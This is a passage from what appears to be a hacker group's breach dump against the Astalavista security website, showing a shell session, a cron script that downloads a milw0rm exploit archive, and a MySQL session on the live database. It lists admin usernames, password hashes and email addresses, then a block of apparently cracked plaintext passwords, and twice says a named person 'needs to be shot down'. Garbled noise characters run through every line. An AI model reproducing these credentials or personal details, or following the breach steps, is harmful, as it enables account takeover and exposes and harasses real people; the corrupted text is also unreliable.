+ N, q; x. A' G* N+ Z% K            $comExploits[$x]['enddate']   = ‘0000-00-00′;8 i3 D$ D1 D; ~5 D( ]" a8 t( X
            $comExploits[$x]['status']    = ‘1′;7 Q1 K% i  p; y9 ~$ y
            $comExploits[$x]['changelog'] = $date;
2 _* N( \1 s4 _) J; X) x) I. Y' Q' j7 I+ r! J, C/ Y% H, T
        }
) a; e; \" T7 h[snip]6 T9 o; I- E7 \9 ]9 e0 O$ i' U
    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
1 \  _# O. o6 a4 t8 D7 _<rss version=”2.0″>/ c: c* Z. k( e9 f$ _6 w
    <channel>
( e* d0 |/ w# x5 o2 \/ {/ {/ Y        <title>ASTALAVISTA.com - Exploits</title>
5 S  d- e# t1 r7 I        <link>http://www.astalavista.com/exploits</link>$ {$ j/ _$ R5 w( w$ ]' Z( Y! A2 z- [
        <description>All availably Exploits.</description>- N4 k2 A7 y+ `) C3 u8 d
        <language>en-us</language>
$ S' g" ]6 V" e" H4 a0 ]4 b        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>* c4 h. q3 B+ @4 g( T7 x
        <docs>http://blogs.law.harvard.edu/tech/rss</docs>9 d6 d1 D4 e2 b+ X+ z! u
        <generator>Astalavista.com</generator>
! r0 u3 N9 p0 `6 C4 V. `        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘4 B; Z2 U  F- H9 Y* s
    </channel>
3 U1 t& {. o' l" t, t- A" a</rss>’;
; N6 a" L; d+ E& |0 m1 M% Z; y9 h1 k) q, m, k: D7 |7 k
    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
7 x% {, H* z9 S1 H        unlink (FULLPATH . ‘/feed/exploits.xml’);+ O- P; C+ T) Z" M" `6 e. d
    }  Z8 S6 q, N+ d( S' ^8 w
2 [- M: o2 W. L' F
    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
: e! R& e7 K8 @9 C9 z/ m$ I! Y( {[snip]
0 p8 h' L/ s8 ]6 ~7 C' R7 Z5 Y3 j) v# O. `/ K
sh-3.2$ cat exploits.sh
9 _& T: n- C( y, Q* W, J0 L; s4 H#!/bin/sh$ ?! D6 d* _- [- ?

& i& z5 M5 [3 r###########################################################
% d- l- N" t1 q  ^2 N' |/ p#                                                         #
0 E! R6 a3 C; }) J#   Title:        milw0rm exploits adder                  #6 o$ q6 `# @0 o$ @. X% W9 f' L
#   Description:  Add all milw0rm exploits to the         #
5 `% Q) f6 w; w+ }, p#                 Astalavista.com database                #
* X+ G" x4 K* R6 y* M#                                                         #7 A  b8 J; K7 [; V& @$ T4 y
#   Company:      Astalavista Group                       #! X# B+ Y. {) q1 s
#   Author:       Paulo M. Santos                         #% z6 l6 x; w/ Y" ~. \' g
#   E-Mail:       链接标记paulo.santos@astalavista.ch             #* R$ E. |& A, ?* w# I# Z
#                                                         #
) L( _9 l! y0 \& f2 G############################################################ f2 U9 Y& p; k
7 X4 u% j$ h4 c% P" D
# path4 c+ x' c& ^% g( I. S
this_path=/home/com/public_html/modifications/cronjobs' ~& a( C) j' k# A2 Y3 ]& _( _

8 z( B" \9 Q; f4 L; a# change directory5 b, p& ]0 x3 y$ g8 z: }: L6 O0 I
cd $this_path
8 D% k8 A: C/ B/ C/ Wcd tmp/1 N% y5 ~# O! ?8 @
7 t" _: x. h" ~8 v7 N
# delete files" x  s4 g( D% X# O2 d, E* a+ J# |/ ?
rm -rf milw0rm.tar.* &
5 H/ S" c8 T( G; |; ]' }% Krm -rf milw0rm/ &
4 t& X, k6 x  O) x7 V& Q7 o# C" W8 H! }# u. \8 N: ?
# wget milw0rm paket
7 e  H- z& g8 V, {9 B8 Rwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
. g2 S. _- O, L& y* ]3 U  d4 V; R1 B, i& {$ |& {
# extract milw0rm paket" x, ?" |& U" q
tar -xvf milw0rm.tar.bz25 i& j* j0 G( s5 C) h% W( j2 J# L$ Z- E
; q" i9 O/ `& H9 s! ^
# change owner
8 {$ I) k& B/ \7 Y- C! z/ g7 ichown -R com .6 P+ T3 i0 Q9 d- ~
chgrp -R com ." A2 c+ `; i4 c- U4 Z& c
( @" ~1 B# y5 _" z+ q; t
# execute php script
* E- q1 r! k9 M, i7 r( Xcd $this_path4 }& _, ^$ r1 P
php -q exploits.php1 ?+ m# t, E7 s2 X  k) J

$ p  g: p" U; ?) n8 N- a( z8 w6 v2 m# delete files2 A, l  {& n$ c
rm -rf tmp/milw0rm.tar.*0 }7 C5 P$ h! r( a. A: R1 j& B3 I
rm -rf tmp/milw0rm/  }, a7 N9 n: R7 x$ V  g
* H. n, [7 n7 h/ I( `
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
# w' W/ d3 P# u4 RPaulo M. Santos needs to be shot down.
+ ]2 ?5 o# p; I0 D+ r+ w2 k* f6 x" x. ?! Q& v
mysql -u contrexxuser2 -p
) D  b3 ^$ l8 @% WEnter password:
( |. R* M% j/ XWelcome to the MySQL monitor.  Commands end with ; or \g.
+ X. s. B, L& ^  Z) g! PYour MySQL connection id is 261694
. w, R) N5 _+ q+ k, oServer version: 5.0.45-community-log MySQL Community Edition (GPL)
# H+ \$ ]3 [- w+ H6 h4 ~8 ~  Q  C0 g# C8 L9 `, q6 b
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* S; m, g- [, k0 ?6 h: x

: o2 I1 }  Q8 r6 p! v$ nmysql> show databases;( S  S. B6 [' I6 F, |
+——————–+6 p3 e5 q6 T  m8 b
| Database           |
- H+ D: d5 Y  q# r% H7 O+——————–+. W; @" M" T* G. D) ^3 o
| information_schema |5 }6 t' l, G3 |/ z% {! t& t
| com_contrexx2      |
) r" S' y& y/ j" i| com_contrexx2_live |
9 }( ^( m7 a( L2 U( k| test               |& S. r1 K) t& S( h
+——————–+) ~  H$ m$ L8 w2 l
4 rows in set (0.00 sec), k4 k" d3 H- B0 N! H  [

, D8 @" M  D  g2 }$ D: g' imysql> use com_contrexx2_live
6 c, Y( H0 q7 u# X- IDatabase changed
1 \3 }4 Q( G! f6 u$ w& s+ j3 G. N+ wmysql> show tables;% l, }% O* P# M) ]( K& v6 t
+————————————————–+
9 n7 X" S# b  Z% m! V* z| Tables_in_com_contrexx2_live                     |- B& \- b# \0 l# @
+————————————————–+
, h- W2 R+ [$ g1 k9 n| cc_banner_counter                                |
1 l# ?4 `" f8 G| cc_search_counter                                |
. N% ]5 }: {. n1 ]& n  \4 Y| contrexx_access_group_dynamic_ids                |
6 W) H7 d' I5 P7 z  Y| contrexx_access_group_static_ids                 |
  ]2 Y- ]4 A  h5 r. Z9 n/ F| contrexx_access_rel_user_group                   |
8 l& a; c: Z9 M. T. v) H. `6 W| contrexx_access_settings                         |: t1 J( V7 A% `/ T5 M
| contrexx_access_user_attribute                   |
* b/ S) p- J% X. k2 T| contrexx_access_user_attribute_name              |
- @& _2 {( V% F7 p$ D) _! g! h4 c) B7 I3 e| contrexx_access_user_attribute_value             |( w) J" H' }: u9 j) |
| contrexx_access_user_core_attribute              |9 [+ {% z& H# d4 K' f
| contrexx_access_user_groups                      |
3 P+ C3 e' H5 X1 G) T  ^8 |, Z& ]: h* x| contrexx_access_user_mail                        |% N$ t% Y* c  Q2 Q: }
| contrexx_access_user_profile                     |& S$ p  Y! Z# y
| contrexx_access_user_title                       |5 O& R3 t4 X4 @. ]* I! `  g4 _
| contrexx_access_user_validity                    |% B9 z% z8 ^( Q- }1 N' g
| contrexx_access_users                            |, m1 _2 @+ Z, @5 V: |  ~
| contrexx_backend_areas                           |
! l# \$ j' @3 _| contrexx_backups                                 |
9 k* e$ B- p/ M  n2 k2 E6 c| contrexx_content                                 |
, q0 o2 K0 L  }# O6 b| contrexx_content_history                         |
- X/ ]# ?% G! }6 |6 o$ {; B/ M8 ^! H1 @| contrexx_content_logfile                         |
# Y7 R6 B# u; q- ^8 V& q6 k2 {| contrexx_content_navigation                      |' B' t+ |' E) p
| contrexx_content_navigation_history              |  R4 u, Y- Y) f  Y
| contrexx_ids                                     |# Z  Z  O+ x& }
| contrexx_languages                               |" k' _' F/ v  \8 B% _' t3 F" h
| contrexx_lib_country                             |
/ ?: t2 s& u3 q7 l! m# l$ Z# B' v| contrexx_log                                     |
0 C* o- R, m$ E* \" [# `| contrexx_module_alias_source                     |# a/ p& _: W8 p5 H% P+ x
| contrexx_module_alias_target                     |: j8 j8 {# C' P) d
| contrexx_module_block_blocks                     |
4 m, `/ b7 N! P/ a| contrexx_module_block_rel_lang                   |
+ y" B' o. Y+ ]| contrexx_module_block_rel_pages                  |
* R. J( D) m$ ?| contrexx_module_block_settings                   |+ z) T% J/ K# E  z
| contrexx_module_blog_categories                  |
2 u9 Y  }) @- X5 `0 i| contrexx_module_blog_comments                    |
7 N9 r2 I  y: P1 N( I" B6 ]| contrexx_module_blog_message_to_category         |
* v9 @, F* w' w4 d3 I6 A: k$ a| contrexx_module_blog_messages                    |/ @8 o0 G7 I- ~8 O- e
| contrexx_module_blog_messages_lang               |
1 u/ ]# l  k2 G: g: V( A1 L| contrexx_module_blog_networks                    |8 f" M: K9 R; G: a: Y: H5 M
| contrexx_module_blog_networks_lang               |
9 k' \: n3 N, c9 a| contrexx_module_blog_settings                    |
  @" Z. c- a! N& Q| contrexx_module_blog_votes                       |' Y$ W& d1 z; l
| contrexx_module_calendar                         |' j3 B1 f( U# ]  l9 b3 k0 p+ k
| contrexx_module_calendar_access                  |
2 c- y! b" j8 j4 a7 ]! ~8 w| contrexx_module_calendar_categories              |- C! W$ U6 Z% y7 q" w% _
| contrexx_module_calendar_form_data               |
8 U1 J. {- O; i2 Y% S4 A# m+ k$ t| contrexx_module_calendar_form_fields             |- `0 O+ v9 s$ q2 r8 ~7 j# h4 V
| contrexx_module_calendar_registrations           |
! ?, e- w/ p9 L7 ?| contrexx_module_calendar_settings                |3 ]( ^5 S! \7 F& W
| contrexx_module_calendar_style                   |
" i# x5 s4 G, u* W: g7 v3 P| contrexx_module_contact_form                     |: \' @4 F! _2 U3 h$ |
| contrexx_module_contact_form_data                |. ^; H, ]1 L( x2 b1 a% z
| contrexx_module_contact_form_field               |
! |- N( h6 V/ I| contrexx_module_contact_settings                 |) w+ O# X2 X' m
| contrexx_module_data_categories                  |. c2 @0 s' l  P' `$ _: n. o
| contrexx_module_data_message_to_category         |& z5 }! a1 V' q
| contrexx_module_data_messages                    |% E. |1 [$ T3 g
| contrexx_module_data_messages_lang               |4 M& |" ^5 i1 X2 K/ p) o/ s5 E
| contrexx_module_data_placeholders                |8 ~' \9 O: n- [% Y6 K  W, ]
| contrexx_module_data_settings                    |
  g; T! c5 _  Y3 G| contrexx_module_directory_access                 |
, p9 ~6 \1 Y% y  y1 T/ d1 X| contrexx_module_directory_categories             |! Z1 F0 {/ t6 |! Y* r
| contrexx_module_directory_dir                    |
1 M" B5 F' G8 h# ^8 l| contrexx_module_directory_inputfields            |
3 P0 ?" d3 }: `. I' R. z| contrexx_module_directory_levels                 |
# P2 |0 [% i, y% O  O| contrexx_module_directory_mail                   |
/ s, w! v: o5 I* _| contrexx_module_directory_rel_dir_cat            |5 ?2 `/ Z/ @$ t: m+ t9 M1 i
| contrexx_module_directory_rel_dir_level          |
9 e# {* ?2 v4 o) X; y# F; q| contrexx_module_directory_settings               |
8 H+ R( k0 M% d5 k8 r  f| contrexx_module_directory_settings_google        |! c; X8 [$ o& Q( j& h
| contrexx_module_directory_vote                   |1 |! r4 p) ^$ h" ?( Y3 x( c2 @
| contrexx_module_docsys                           |
; j1 N+ l' l$ ?5 v# F| contrexx_module_docsys_categories                |
0 S' O; K  T3 b9 q| contrexx_module_egov_configuration               |
/ G3 }4 Z7 G8 ^* H9 B, @9 d| contrexx_module_egov_orders                      |% N% e1 j$ y- ~& z9 L' @. e
| contrexx_module_egov_product_calendar            |
3 ]7 a2 N0 W% E5 U| contrexx_module_egov_product_fields              |
1 R4 a* |; U7 z| contrexx_module_egov_products                    |
8 M; @) s$ _$ w6 g) S6 K| contrexx_module_egov_settings                    |0 R$ L; H5 A# F) v7 @  f  F
| contrexx_module_exploits                         |
/ o4 j. I! n8 p, a' N7 k( j| contrexx_module_exploits_categories              |, \" ?8 K: ~+ X/ z
| contrexx_module_feed_category                    |4 m# T3 V/ p, o! l8 ?
| contrexx_module_feed_news                        |
; {1 ~6 X8 Q+ }; l| contrexx_module_feed_newsml_association          |
( X. F+ K, a9 s2 j- B| contrexx_module_feed_newsml_categories           |
" k: z+ F; ?$ L+ o. @' C| contrexx_module_feed_newsml_documents            |
# Z& e) F) s8 ^# N4 J| contrexx_module_feed_newsml_providers            |
: l) c9 o) ~% b4 g6 g. D7 m| contrexx_module_forum_access                     |
$ q' b" Y/ ?; l| contrexx_module_forum_categories                 |
8 h% T& r$ a$ f| contrexx_module_forum_categories_lang            |! x' Z" ]" g' b/ i% l0 n% S; j
| contrexx_module_forum_notification               |1 L5 R# J# \( x) t+ P
| contrexx_module_forum_postings                   |4 Y7 z: W2 q8 R" [
| contrexx_module_forum_rating                     |) U5 h- F; r. H7 }5 k0 Z& E
| contrexx_module_forum_settings                   |/ `% f  ^% z5 O; X" U/ r3 Q
| contrexx_module_forum_statistics                 |3 `# m  A  T' s" Z. X: z
| contrexx_module_gallery_categories               |8 u7 \/ t# x. M
| contrexx_module_gallery_comments                 |
2 t- a2 |0 j: c| contrexx_module_gallery_language                 |& @. d# c# r0 x0 m% r: p
| contrexx_module_gallery_language_pics            |
) t' B% ?& \3 d1 G6 w! J7 h| contrexx_module_gallery_pictures                 |9 g7 v$ V* Q$ ]( Q0 r* M
| contrexx_module_gallery_settings                 |3 Q% F* w6 o0 W* Q; f7 B0 O
| contrexx_module_gallery_votes                    |6 ^, H" N0 S- Z
| contrexx_module_guestbook                        |
/ e3 S+ W0 u9 r5 y, y| contrexx_module_guestbook_settings               |
" {( v4 f/ d3 E" q, @! Y| contrexx_module_livecam                          |
: `. R, A; ]) C' Y# N| contrexx_module_livecam_settings                 |5 ?! K3 b1 s! s) o
| contrexx_module_market                           |7 t# z8 U/ i! i
| contrexx_module_market_access                    |( b! ]  S+ O% v* \+ Z( n" h) `
| contrexx_module_market_categories                |
# i% w) N9 ~6 |1 e3 j| contrexx_module_market_mail                      |6 G" e: [2 V8 ]' d* g8 ]  x1 n' z
| contrexx_module_market_paypal                    |
4 X9 K) j( x' B4 S1 {' y| contrexx_module_market_settings                  |
7 r" c- b5 w( p) X; }| contrexx_module_market_spez_fields               |* Z9 A) d4 L0 I1 L) {  ]
| contrexx_module_mediadir_access                  |
  ~1 E! R2 z1 k3 k& T| contrexx_module_mediadir_categories              |6 n* H# T8 |9 o& D3 N7 Z8 Y
| contrexx_module_mediadir_comments                |
( j; r4 Q3 G; S% \| contrexx_module_mediadir_dir                     |" w5 |1 f7 m7 v0 S# z; p* Z  m
| contrexx_module_mediadir_inputfields             |
4 y$ Z7 ]4 _% k2 ~2 I% \: L| contrexx_module_mediadir_levels                  |
; q( A, n: ?2 z( }| contrexx_module_mediadir_mail                    |
. I5 K/ |2 w/ j* n" Z$ r7 {| contrexx_module_mediadir_rel_dir_cat             |) v' `, t/ J4 J" r8 {
| contrexx_module_mediadir_rel_dir_level           |
+ e' B9 ^; s" o, h8 x| contrexx_module_mediadir_reports                 |
" _! T, X0 ]  S% d7 {3 G| contrexx_module_mediadir_settings                |
5 q+ n& w/ X% U1 H  ~& z8 C) C| contrexx_module_mediadir_settings_google         |0 j5 D4 @  O2 ^; ?
| contrexx_module_mediadir_vote                    |$ ]2 B% _1 g" M0 S% q0 I7 b  v
| contrexx_module_memberdir_directories            |
1 H- [/ w1 O4 l3 u1 E. T| contrexx_module_memberdir_name                   |
& b" N5 i0 h$ Y$ w1 Q) }, f| contrexx_module_memberdir_settings               |
1 L6 t  d+ P* V2 O1 w9 m| contrexx_module_memberdir_values                 |
- V6 T2 L& {1 s3 L4 Q" v| contrexx_module_nettools_allowed_groups          |0 B* k/ x9 s8 T# d
| contrexx_module_nettools_settings                |
' m  V5 L9 h* o8 \| contrexx_module_news                             |8 H+ H) U" U1 A: d
| contrexx_module_news_access                      |
, x6 h3 z1 o9 @! C  }$ u6 h, B3 |% S+ Y| contrexx_module_news_categories                  |" r1 q1 p9 h& T, }2 y4 W
| contrexx_module_news_settings                    |$ j- w) _3 |$ o/ o( H: b
| contrexx_module_news_teaser_frame                |
9 ?$ I- L% }9 o9 j$ }# Z+ J| contrexx_module_news_teaser_frame_templates      |% z6 I3 P* {; O: [) p" p  o! M
| contrexx_module_news_ticker                      |
3 E( _0 I( e2 I' d; }! c| contrexx_module_newsletter                       |2 M6 _0 B7 C* u4 b7 a
| contrexx_module_newsletter_attachment            |7 T6 X. c- U) K& T
| contrexx_module_newsletter_category              |+ d! |7 Y- ]: X3 |
| contrexx_module_newsletter_confirm_mail          |9 O3 t" S/ F" I$ O2 ]
| contrexx_module_newsletter_rel_cat_news          |
0 h; c3 u  f2 P+ W7 Z7 d4 p| contrexx_module_newsletter_rel_user_cat          |
1 K. ~) ?- {7 \# j; @| contrexx_module_newsletter_settings              |
2 Q6 y5 S# ?  a8 N9 C! d| contrexx_module_newsletter_template              |
+ R. M) u* ^' K| contrexx_module_newsletter_tmp_sending           |8 K3 i/ G5 Z0 B( L' _/ |0 t, b" D2 N
| contrexx_module_newsletter_user                  |7 C9 J7 i6 f9 g9 w6 K2 z" t
| contrexx_module_newsletter_user_title            |
) X+ l3 G9 N9 U& n' l% f| contrexx_module_onlinetools_defaultports         |
  R, v& V7 r" ~, K0 u| contrexx_module_onlinetools_defaultports_back    |0 g# P6 Z8 c# h7 G2 {
| contrexx_module_onlinetools_geolitecity_blocks   |* K0 _' t- Q( q) L, m
| contrexx_module_onlinetools_geolitecity_country  |1 i+ D8 G6 P4 T, z+ V+ C4 H. f
| contrexx_module_onlinetools_geolitecity_location |% F! F; J4 D. d! |* P) b
| contrexx_module_podcast_category                 |7 J* C; x+ N3 |# j( d* Q$ r& i
| contrexx_module_podcast_medium                   |
$ W: e. ?  q. P8 m4 @, `& H| contrexx_module_podcast_rel_category_lang        |/ l* D% K: `5 y2 W+ C
| contrexx_module_podcast_rel_medium_category      |
4 i+ T! [+ L4 }, q6 w, }# s  d| contrexx_module_podcast_settings                 |6 m: W4 E2 a& P8 Q/ I9 j& V2 p
| contrexx_module_podcast_template                 |
. M" u# ^, h' Q) v2 G2 _| contrexx_module_proxydb                          |. }) u4 Q1 ]1 K# S8 N
| contrexx_module_recommend                        |
" R2 }, O$ n& r+ g0 F9 x. G| contrexx_module_repository                       |
! `( n  _9 I1 O' \/ i5 f| contrexx_module_securitynews_cats                |
( x7 \; h: G( ^% N| contrexx_module_securitynews_feeds               |9 d3 n; G) V. n# P. f( y
| contrexx_module_securitynews_news                |  ~/ N+ p8 w- `4 g) L1 j0 p
| contrexx_module_shop_categories                  |; ]6 Z( {. w( h# W9 G7 \, a2 I
| contrexx_module_shop_config                      |6 ~& M9 L& f- t
| contrexx_module_shop_countries                   |
9 C/ k2 Z  u/ E# H0 E  x* Z| contrexx_module_shop_currencies                  |
, E% O/ g6 ^, P+ R! I; X) D) D- g| contrexx_module_shop_customers                   |( d7 b! f6 Q/ Q: p
| contrexx_module_shop_importimg                   |
$ U7 u9 i0 C! _! Z: X+ F| contrexx_module_shop_lsv                         |! B1 y8 {7 p9 c3 f9 |( L) t
| contrexx_module_shop_mail                        |
9 |' }; g* v- D  Y$ R) }| contrexx_module_shop_mail_content                |
! ?6 c9 f2 s9 x; W, c5 k4 k| contrexx_module_shop_manufacturer                |& I3 L1 R" s/ L( z; [
| contrexx_module_shop_order_items                 |
/ C' _1 p. b  D2 G0 w: e| contrexx_module_shop_order_items_attributes      |1 C' ]8 L2 N$ G: C  p8 g
| contrexx_module_shop_orders                      |7 P% c8 Q' A+ o, y1 j
| contrexx_module_shop_payment                     |
- U$ C* q; f& H! [" Z| contrexx_module_shop_payment_processors          |
  A, K+ h* y) V) \; u) ]0 H2 |9 @| contrexx_module_shop_pricelists                  |
/ k# w8 W* s( B1 B7 j2 |7 \& |% @* P| contrexx_module_shop_products                    |
% v3 w9 x) X. r7 e/ d' i' l| contrexx_module_shop_products_attributes         |
' S, O' Z  d- D: r2 `& a! F| contrexx_module_shop_products_attributes_name    |7 A/ A3 Q& Z- M5 \' E' |
| contrexx_module_shop_products_attributes_value   |) ~& {3 c9 q4 r) _/ a# l3 D
| contrexx_module_shop_products_downloads          |
5 Q+ w( e% Z3 T3 [| contrexx_module_shop_rel_countries               |
% a/ [# X6 O: Z| contrexx_module_shop_rel_payment                 |
/ b' E( N" v; H) l# k( I| contrexx_module_shop_rel_shipment                |- m+ u8 B) t6 M2 c6 {( ]' l8 k6 `+ }) V
| contrexx_module_shop_shipment_cost               |
5 U1 w2 {0 b+ n9 K) `| contrexx_module_shop_shipper                     |
+ ~+ ], T& n- N| contrexx_module_shop_vat                         |
) X2 s' e: o, f| contrexx_module_shop_zones                       |
/ ]/ c  c2 h& b$ R# h$ K$ p| contrexx_module_u2u_address_list                 |) ^6 f  Q0 h8 s; g5 E& q; P
| contrexx_module_u2u_message_log                  |
$ v# w& `% p7 X  @- U2 u( P| contrexx_module_u2u_sent_messages                |
( v1 a# Q6 d! [' x0 b6 M- p| contrexx_module_u2u_settings                     |$ S3 a. }- k$ r" Y6 F! h
| contrexx_module_u2u_user_log                     |
+ X7 s9 t. s3 ~# {3 Z& p+ k2 }| contrexx_modules                                 |6 D5 P, E4 G9 x/ y( T% e4 V
| contrexx_sessions                                |; m7 P3 D, z2 X# R1 Y, P* `
| contrexx_settings                                |( `8 F! d" K% V
| contrexx_settings_smtp                           |
5 _) u+ c+ q5 |8 I6 Q! j| contrexx_skins                                   |
8 T( I* I: O5 P; J| contrexx_stats_browser                           |
- u+ e2 n- U) p9 _# i2 i$ g2 I" Z| contrexx_stats_colourdepth                       |
5 h& m5 s4 }, u% Y0 \| contrexx_stats_config                            |/ B' L+ A* c$ M* g
| contrexx_stats_country                           |
2 E, ~1 [# I% x) V- J4 e3 D| contrexx_stats_hostname                          |6 s7 t% Q5 Y5 K& p6 c' ]
| contrexx_stats_javascript                        |
8 k1 d3 c; a4 G8 }) || contrexx_stats_operatingsystem                   |9 u( {2 v; k4 b& d6 ], ]: R
| contrexx_stats_referer                           |+ T- T7 r& j2 J# x, e
| contrexx_stats_requests                          |/ ^2 |) r# ]2 G/ h7 ~
| contrexx_stats_requests_summary                  |
& h1 x" y0 a' d9 {/ s* ?| contrexx_stats_screenresolution                  |
; M7 i  [+ Z' F$ t8 q/ S* P. z| contrexx_stats_search                            |1 Q- |' N" L5 k2 N% \
| contrexx_stats_spiders                           |; v' W: c! t! h! @/ Z
| contrexx_stats_spiders_summary                   |
/ }- f3 l4 r4 U$ E| contrexx_stats_visitors                          |" o) H* G, {) t9 p) N+ i+ x
| contrexx_stats_visitors_summary                  |3 h6 E) Y- r6 r" o4 ?8 f
| contrexx_voting_additionaldata                   |9 b) G, x3 a  q# m& P
| contrexx_voting_email                            |
$ [* f0 |0 k; ?$ [6 |0 q- U5 a8 ]2 p| contrexx_voting_rel_email_system                 |4 g9 N& A  D3 Y8 u
| contrexx_voting_results                          |. P. w7 ^/ v/ [, U2 J( j( w/ L) H
| contrexx_voting_system                           |% x5 `8 F- Y2 Y
| foo                                              |
, _# Y/ P1 ~( |* T# I+————————————————–+* L$ S& u9 p" _' `% w
227 rows in set (0.01 sec)- _  L" e- J- y$ }

# L+ U7 r5 c' B. s" h. umysql> select count(*) as skids from contrexx_access_users;3 R% l, W! `) Y7 K
+——-+/ I. J0 ?. [9 Z
| skids |6 M3 V% W# ^" Q, C* ]  a4 K# {
+——-+3 O$ v: {: o2 N# u
| 53699 |
3 b8 |6 A" {7 B* d/ u, C1 F+——-+
6 ?" N! @/ D9 T# T" u+ {2 a1 row in set (0.00 sec)3 ^9 a5 E# R- f7 C' O

9 \& U/ Q3 j7 d7 l/ bmysql> describe contrexx_access_users;
- p+ ?& x0 d' S7 `" R8 r) \- T/ G+——————+——————————————+——+—–+————–+—————-+: h: @2 c& l. l1 }  _* G
| Field            | Type                                     | Null | Key | Default      | Extra          |
+ @+ W$ j( n1 h+——————+——————————————+——+—–+————–+—————-+
) W& o! k+ d0 F- m$ V2 @* o| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |3 Q0 R5 Z  J5 a; T9 A$ I) N
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |' p, @9 V" W. Y# S- d+ [; U
| username         | varchar(40)                              | YES  | MUL | NULL         |                |
3 W" z4 N' H6 k5 i1 f| password         | varchar(32)                              | YES  |     | NULL         |                |, W  h2 Z' `! z0 m7 A# U
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |( x& o  z! A8 P, F1 \! h
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
; w) t& R3 F; z* z- E5 [5 Y" r| validity         | int(10) unsigned                         | NO   |     | 0            |                |) ~. V; d; q2 K/ N# j- t2 |  O
| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
" [! f" i$ F; y4 B. ], k| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |( d1 x: m9 ~9 H0 M4 @' H5 H0 j
| email            | varchar(255)                             | YES  |     | NULL         |                |3 B, w6 B# q( o7 q% y
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
. F  D. A! ^: d| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
1 g8 }# |6 U0 v" T/ h| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |6 X2 A" W. c4 t- d6 u
| active           | tinyint(1)                               | NO   |     | 0            |                |) _% G! q7 X6 k  a3 F% ]' ?; C
| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
, H% t* w9 [2 `- o4 h# H/ q| restore_key      | varchar(32)                              | NO   |     |              |                |
5 E/ w# E7 Q" k: f4 Y% B/ J# u| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |
# G2 W  p! |5 z7 _9 n| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |$ V7 D, F; i1 @& l" S! `9 g7 E
+——————+——————————————+——+—–+————–+—————-+3 w' e4 `# W+ k' }; [
18 rows in set (0.00 sec)
# i; m0 g' f  x2 D' n
/ T  {% M8 j" ^) [mysql> select username,password,email from contrexx_access_users where is_admin = 1;! M4 H4 ?- p5 u# t% x
+————+———————————-+—————————–+
( R3 \& A9 E! M: \, E6 M4 J| username   | password                         | email                       |
4 a* M0 R+ V$ L1 s+ n$ W+————+———————————-+—————————–+2 E0 n# W5 b/ I2 h
| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |  W2 R" ?0 f: e) o2 W- x& C
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
  P* P0 l+ _. k( H2 a4 m| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
$ B3 g% \3 Q* R  R1 |; O& Q| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |
; V6 Z% z7 f: p7 e- o2 B! a+————+———————————-+—————————–+
' z; O+ w4 _" D% q. |# s& v* `, w) k) e4 rows in set (0.04 sec)
# B5 F8 y+ ?' q" Z6 T
1 V* \2 G  Y2 g8 f8 f0 U7 ymysql> exit;
1 d7 E" A5 S+ u8 T: rBye( f, e4 T1 p% w1 M9 q

2 t3 t& }3 W0 A  K7 T4 |5 [. [[~] There you go, your “team of security and IT professionals” is a joke.: ?6 H9 _4 L0 y+ T- b3 Y
' }: G( z9 z; H! _% k# C) _
+——————————+" T+ T9 t! h1 }* y
system:f82BN3+_*( s: t8 V& d* U
Be1er0ph0r:belerophor4astacom( l& Y3 ]  u: C
prozac:asta4cms!1 B8 H" a: e2 b' D
commander:mpbdaagf6m4 N2 K: w# s' Y/ `9 }
sykadul:ak29eral8 j! }  d8 A& S2 R) U/ b2 Y
+——————————+
( U) @" `5 e0 l- W8 F$ m
4 v' p- R" U8 h  V3 f- B" }[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)4 F8 M- }3 \5 ?
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
. f7 I9 n: Z& b5 n* c/ \3 h
* {* N4 m+ M7 p[~] Lets move to astalavista.net now," A9 S9 o$ B+ O) Y+ S
/ p9 i5 q4 x5 P8 L1 @
From <链接标记[url]https://www.astalavista.net/[/url]>:* p, v# f* {" T
>> Everyone knows that the best defense is a good offense.1 l2 F0 J( ^3 R: x1 o. Z; C& u
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.9 L; B5 C7 ~* `: b/ a: A
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
" a7 Q9 l3 s1 L+ f>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”$ q' x. @7 B. P" u9 _" C
2 U+ A9 I! A- s5 X; S. H; D
>> Go ahead, try and hack our server . in a completely legal way!1 d+ y3 X  v6 e( I  `8 `- n0 n0 J) _
>> Learn by doing: We offer our members tricky tasks and challenges on an/ O( a# D! h+ |- W- G
>> ongoing basis so you can test your knowledge and abilities. You can also, j, y/ K0 O6 z! @8 E( P2 ~
>> demonstrate what you.ve mastered by taking part in regular hacker contests2 Z; y$ g' |$ y& G+ v/ {/ y9 F
>> and war games
7 D9 ]- T7 h0 ]2 z, W+ S7 j5 l" s* s, r% y) {9 t' i2 R$ V
